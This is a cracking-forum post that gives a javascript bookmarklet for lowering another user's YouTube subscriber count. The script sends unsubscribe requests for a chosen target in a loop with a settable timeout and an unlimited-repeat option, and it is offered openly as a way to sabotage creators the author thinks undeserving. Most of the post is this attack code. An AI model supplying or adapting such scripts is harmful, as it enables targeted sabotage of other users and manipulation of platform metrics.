Tuesday, 03 Mar 26, 11:18 PM
Welcome Guest

PC Software Zone Forum

[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum moderator: xsqbx786  
How To Lower Someone's YouTube Subscription Count
softwarescrackerzDate: Thursday, 17 Mar 11, 2:03 AM | Message # 1
Courtier
Group: *
Messages: 196
Awards: 0
Reputation: 1
Status: Offline

How To Lower Someone's YouTube Subscription Count?

YouTube is the largest video-sharing website on which users can upload, share, and view videos. When you subscribe to someone, you are constantly updated on which of your favorites (the people you subscribe to) has uploaded a new video.

That way, you don't have to constantly search for their username, you just have a convenient list of the tubers you like the best. But there are users that are paying for great promotion on their videos on YouTube, and they are getting a lot of subscriber, which in fact they don't deserve to have it.

So here i will show you how to lower someone's subscription count on YouTube. It's very simple method, but totally worth it.

First, you have to subscribe to them. Next, enter this code into the address bar

j

Code
avascript:function unsubscribe() {  

     httpreq=new XMLHttpRequest();  

     httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);  

     httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');  

     httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));  

     if(!httpreq.responseXML) {  

   setTimeout('unsubscribe()', timeout);  

   return;  

     }  

     if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='
You have successfully unsubscribed.
') {  

   alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);  

     } else if((window.status=++count)!=times) {  

   setTimeout('unsubscribe()', timeout);  

     } else {  

   alert('DUN');  

     }  

}  

count=0;  

if((username=prompt('enter target\'s username', 'Fred'))!=null) {  

     if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {  

   if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {  

     unsubscribe();  

   }  

     }  

}  

void(0);

That's done!!
Observe at the target subscriptions now.

 
  • Page 1 of 1
  • 1
Search: